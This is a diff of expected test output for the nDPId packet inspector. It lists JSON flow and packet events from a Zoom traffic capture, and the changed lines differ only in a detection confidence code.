+00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.637537} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469081,"flow_last_seen":1569520469081,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520469081,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569520469081,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520469081,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAog\/0AAEAG0h7AqAF1DeFUttYOAbuSOQajVAdu1VAQECZHdwAA"} 
-00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520468959,"flow_last_seen":1569520469090,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520469090,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520468959,"flow_last_seen":1569520469090,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520469090,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569520469116,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1569520469116,"pkt":"KDc3AG3IEBMx8Tl2CABFAAAoaEVAAO8G\/tUN4VS2wKgBdQG71g5UB27VAAAAAFAEAADwhQAAAAAAAAAA"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469189,"flow_last_seen":1569520469189,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469189,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569520469189,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABICu4AAEAR5YzAqAF1ov8lDl1fDZYANPtTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569520469200,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469200,"pkt":"EBMx8Tl2KDc3AG3ICABFAABISukAAEARpZHAqAF1ov8lDl1fDZYANPtTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} -00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520468959,"flow_last_seen":1569520469200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520469200,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01219{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520468959,"flow_last_seen":1569520469201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520469201,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520468959,"flow_last_seen":1569520469200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520469200,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
+01219{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520468959,"flow_last_seen":1569520469201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520469201,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1569520469210,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469210,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIjkkAAEARYjHAqAF1ov8lDl1fDZYANPtTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569520469189,"flow_last_seen":1569520469210,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469210,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569520469189,"flow_last_seen":1569520469210,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469210,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469221,"flow_last_seen":1569520469221,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569520469221,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469221,"pkt":"EBMx8Tl2KDc3AG3ICABFAABI9l0AAEAR+RzAqAF1ov8mDl1fDZYANPpTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469221,"flow_last_seen":1569520469221,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469221,"flow_last_seen":1569520469221,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569520469231,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469231,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIQ9kAAEARq6HAqAF1ov8mDl1fDZYANPpTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569520469242,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469242,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIKAsAAEARx2\/AqAF1ov8mDl1fDZYANPpTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469253,"flow_last_seen":1569520469253,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469253,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1569520469253,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469253,"pkt":"EBMx8Tl2KDc3AG3ICABFAABI+hMAAEAR9WbAqAF1ov8mDl1fDZcANPpSAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469253,"flow_last_seen":1569520469253,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469253,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469253,"flow_last_seen":1569520469253,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469253,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569520469264,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469264,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIADMAAEAR70fAqAF1ov8mDl1fDZcANPpSAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569520469274,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469274,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIzF0AAEARIx3AqAF1ov8mDl1fDZcANPpSAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469340,"flow_last_seen":1569520469340,"flow_idle_time":7580000,"flow_min_l4_payload_len":263,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":263,"midstream":1,"thread_ts_msec":1569520469340,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -69,145 +69,145 @@ 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469341,"flow_last_seen":1569520469341,"flow_idle_time":7580000,"flow_min_l4_payload_len":1368,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1368,"flow_avg_l4_payload_len":1368,"midstream":1,"thread_ts_msec":1569520469341,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02323{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569520469341,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1434,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1434,"pkt_l4_len":1400,"thread_ts_msec":1569520469341,"pkt":"EBMx8Tl2KDc3AG3ICABFAAWMAABAAEAGb1\/AqAF1I7rgNdJwAbu\/4X6L2uaJRIAQEAC3VgAAAQEICiWc2ySFp5bjFwMDBZ4AAAAAAAAAkgusoLvJ6vSttM3Q7UxWnNoYus44vvH4fsNNbl6rpvk6OYpGeuvwflaMmUGTYIrirttSlsO38H0GA7wE0xtelFBUIqtPaG2zLaELN02TEy8tUFQrsrqVaYUsCYJ2hIqsiRr8HUVz8JaKDjyEbW\/6SDuFmHrK8XtHElqv0awJOAEmL3KNt0jVBWwHCGEFsZPcfO1pHuuoiBuup3wZUBRnIJST+dFPme0TV6vJ+IxOjx\/mA8fFWqQdV0lKttFkpnySiRxX5yrxpipVJy4p7z67+kAmdWhmjAbJ0jKiyDw+DcyTkynUokZHprab8MCYp\/TQx3xlQiW8+bdGrifHDAXawAfxdyEnxRfDIbdQKLwqUd3q\/7pZfr\/4d1tUDgm0WlajX7mPfF9WlQlsZCy+ChrMLq6KB65LC24miZN0Oh\/kWW3n1lqgTdT6wyEHUQbhN7aMRFDURjgWnZBDWn4PrH7p5zNvQSTu1\/tX7DHH9FI+E\/S8F73db4ge7KXn\/dETNp0MT++lGzZNvQ8tP2HIXFPFo1PFoNApoahzcRPgbV1rmTnmuWdwR6k9v2rQ51IRkvomJ5+TW8zK\/T3dpZj8bQ2ZXFOOqjyv1+mdfNtQelTeuF+xFuT9k3w43crUkirHNjO6HDcTH8g5iwOfX\/P5Ze+j2MahTCw4IqO2cgO0GUqqgaRqFgkBd4qtJfEyTzJvn2QyDNF8nXiqgRtiC89ltDf6sKzt1TUcglqiIso29y4WBLLmAnOlHxC5COmZYEu0CraDE3vjq3Eo6QVYa5U+p4OKJ9K9r563eLKRSjLRb\/GJwoU19nJfa5zVERWEq0IToF\/rMA7vLUy3muT3dZmJxkOsSuFN\/Usyd+T412g2p1ZdXXnKqATMbFh
bdBtC\/y58N+Ld\/82QR9uhyJTGIl+G7bL56l07dPTLTdZ8Usdj23buwPw30vMgmi+E2m8MN9Y502dlBs94rGej8il7sUNS4pRHgYLTyWg6cZyS8AsHVWXff0sHuCuhPPV8M5EKNXzyntJ0gexz8gHMiqPY4NI0Ni\/OneEqQ4C8E6uqXvI2kcZ2BOG\/p4MX8o3AIWp7ayyFuWOJxi2lw6TEu8NuHHmGI4kv4FI3\/kgSQc6sf3SB44BSo3k4njWMAfAGbStQzO7TdByZBgUmqKdUtWCav3gJeVcsVZvgE+oEb2RNn0kn49ZouFmtBZa4MHnF81Rig78AE6ulpakr3aQ66b3O\/vtpHtpLOQcnjEQ\/qS+\/M1GayjxpQWCXEP02WwpvuLolzsWcvLf0N4iVpkzaVwjd0PnTczMC0nRmMJNbIBUnjIjJ5eKWfHSbRJbj\/MtVxqJwc8zwost2cccITh0lHc81zUSBD7GSF5b9zV7g2B0N4HfRanVjZhq4\/wraioSAC+795Umn4JCnMPSUAwuEnGuY7\/qhVrVORRO8KqXtC5\/5m+ff6XLy24O2WsPRzzPmP37Tt6opYkQlNaCU6f6MSh5leucVqZunkohryKjXGP2HU49rKyG4sSngfKn7U3ByAtKcO8nimiTP81z1QcgS2WUUKeZI5VJBPQ5toQ20MunmnQc+AjUHR7cCT28cN30m+ZL49Jt0RzL1N4yKvfdecf7UAMl9WG3IWewXXS8itIsi3DkAYv6t2MOlXE9XEWXdwxfePqJvzpR\/iHVQx\/6oobZRIQjxTbqoCvtXEg2uj6gJpcxIkn9+KrUGRl5tdROeMX0NbfZvt+g+tOcHvsvl+k5qrsiSB57D9TdRPsfMHD4AQRHjKQWksr1jHIvNkgNXnSPAu9+rrqEJ8piMP7LlZAKGZwhC"} 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1569520469341,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1569520469341,"pkt":"EBMx8Tl2KDc3AG3ICABFAAB\/AABAAEAGdGzAqAF1I7rgNdJwAbu\/4YPj2uaJRIAYEACuSgAAAQEICiWc2ySFp5bjD8rJVgENkhz7SGo+3tsT+62YMYedQzLcJKiig4pAH+hO24ZoiQ1LNK0ZidRBnPFEPrr+zH4y+BGqQ1wCDA9XJFEjegtqGmZzuBXv"} 
-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469341,"flow_last_seen":1569520469341,"flow_idle_time":7580000,"flow_min_l4_payload_len":75,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1443,"flow_avg_l4_payload_len":721,"midstream":1,"thread_ts_msec":1569520469341,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469341,"flow_last_seen":1569520469341,"flow_idle_time":7580000,"flow_min_l4_payload_len":75,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1443,"flow_avg_l4_payload_len":721,"midstream":1,"thread_ts_msec":1569520469341,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1569520469354,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469354,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA07H8AAHcGkTcjuuA1wKgBdQG70nDa5olEv+GD44AQA\/fBegAAAQEICoWn6LklnNsk"} 
